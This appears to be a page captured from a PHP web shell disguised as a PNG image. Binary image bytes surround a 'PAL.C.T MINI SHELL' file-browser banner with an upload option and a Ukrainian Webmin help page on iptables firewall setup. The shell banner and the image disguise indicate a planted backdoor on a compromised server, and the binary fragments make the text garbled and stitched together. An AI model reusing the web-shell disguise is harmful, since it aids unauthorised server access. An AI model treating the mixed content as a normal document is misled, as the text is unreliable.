php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall6/help/
upload
files >> //usr/libexec/webmin/firewall6/help/intro.uk.auto.html

<header> Брандмауер Linux </header><h3> Введення модуля </h3> Цей модуль дозволяє налаштувати функції брандмауера IPtables, знайдені в ядрах Linux серії 2.4. На відміну від деяких інших програм конфігурації брандмауера, замість створення сценарію оболонки, який встановлює брандмауер, він зчитує та редагує файл збереження у форматі, прочитаному та записаному <tt>таблицями ipi (6) - відновлення</tt> та <tt>ipi (6) - збереження</tt> відповідно. <p> Якщо у вас вже є брандмауер у вашій системі, який був налаштований вручну або з файлу сценарію, модуль запропонує перетворити його у файл збереження для IPtables для вас, а також створить сценарій для запуску під час завантаження, щоб активувати правила в файл. Однак, якщо ви це зробите, тоді вам більше не слід редагувати сценарій правил брандмауера, а також забороняти його працювати також під час завантаження. <p><h3> Огляд IPtables </h3> Кожен мережевий пакет, який потрапляє, виходить або передається вашою системою, перевіряється на одній або декількох ланцюжках, щоб визначити, що з ним станеться. Кожен ланцюг містить нуль або більше правил, у кожному з яких є умова (визначати, яким пакетам він відповідає) та дія (керувати тим, що відбувається з цими відповідними пакетами). Кожен ланцюг також має дію за замовчуванням, яка контролює, що відбувається з пакетами, які не відповідають жодному правилу. <p> Кожен ланцюжок є частиною таблиці, на даний момент їх три: <ul><li> <b>Фільтрація пакетів ( <tt>фільтр</tt> )</b> <br> Ланцюги в цій таблиці можуть використовуватися для управління даними, що надходять у вашу систему від інших хостів у мережі, даними, що надсилаються з вашої системи користувачами та процесами, і даними, переданими вашою системою, якщо вона виступає в ролі маршрутизатора. <p><li> <b>Переклад мережевих адрес ( <tt>nat</tt> )</b> <br> Ця таблиця може бути використана для налаштування NAT або маскування, що корисно, якщо ви хочете надати всій мережі машин доступ до Інтернету за допомогою лише однієї реальної IP-адреси. <p><li> <b>Зміна пакету ( <tt>mangle</tt> )</b> <br> Ця таблиця призначена для зміни пакетів, пересланих або відправлених з вашої системи. <p></ul> Окрім стандартних ланцюгів, що входять до кожної таблиці, ви також можете створити власні ланцюги, які можна керувати правилами в ланцюгах вбудовування. Це може бути корисно для групування та обміну правилами, які можуть бути використані в декількох місцях. <p><h3> Головна сторінка </h3> На головній сторінці цього модуля перераховані всі ланцюги та правила з однієї з доступних таблиць, вибраних зі списку у верхньому лівому куті. Нижче наведено розділ для кожного ланцюга в поточній таблиці, з усіма переліченими правилами в кожній ланцюжку та їх умовами, описаними якнайкраще для можливостей модуля. Для кожної ланцюжка ви можете змінити дію за замовчуванням, використовуючи розкривний список, якщо ланцюжок є одним із вбудованих для таблиці, або видалити її за допомогою кнопки Видалити ланцюжок, якщо вона визначена користувачем. <p> Ви можете натиснути на будь-яке правило ланцюга, щоб змінити його, натисніть стрілки праворуч кожного ряду, щоб перемістити його вгору або вниз, або натисніть кнопку Додати правило, щоб додати нове. Якщо додати або відредагувати правило, ви перейдете на сторінку, на якій ви можете вибрати дію для кожного правила, та умови, за якими виконується дія. <p> Внизу сторінки розміщена кнопка для <tt>активізації</tt> поточної конфігурації брандмауера, завантаження її в ядро за допомогою команди <tt>ipi (6) таблиці-відновлення</tt> . Внизу знаходиться кнопка для здійснення зворотного - прийняття конфігурації, яка зараз знаходиться в ядрі, і надання її для редагування. Нарешті, якщо ваш дистрибутив підтримує це, є кнопка, щоб змінити, чи брандмауер активований під час завантаження чи ні. <p><h3> Фільтруючі ланцюги </h3> Для кращої співпраці із зовнішніми сценаріями iptables ви можете виключити окремі ланцюги з обробки брандмауером. Для цього потрібно вибрати пряму обробку правил у налаштуваннях та ввести список фільтрів, що виключає відповідні ланцюги з обробки. Ланцюги, які не видаляються з редагування, позначаються повідомленням &quot;не управляється брандмауером&quot;. <p><h3> Набори IP </h3> Новіші версії таблиці ip (6) підтримують розширення ipset. Набори IP - це списки IP-адрес у основній пам&#39;яті, які можна шукати дуже ефективно та використовувати як умову в правилах. На головній сторінці відображаються існуючі набори IP, які можна використовувати правилами. Однак на даний момент керувати ними в брандмауері неможливо. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`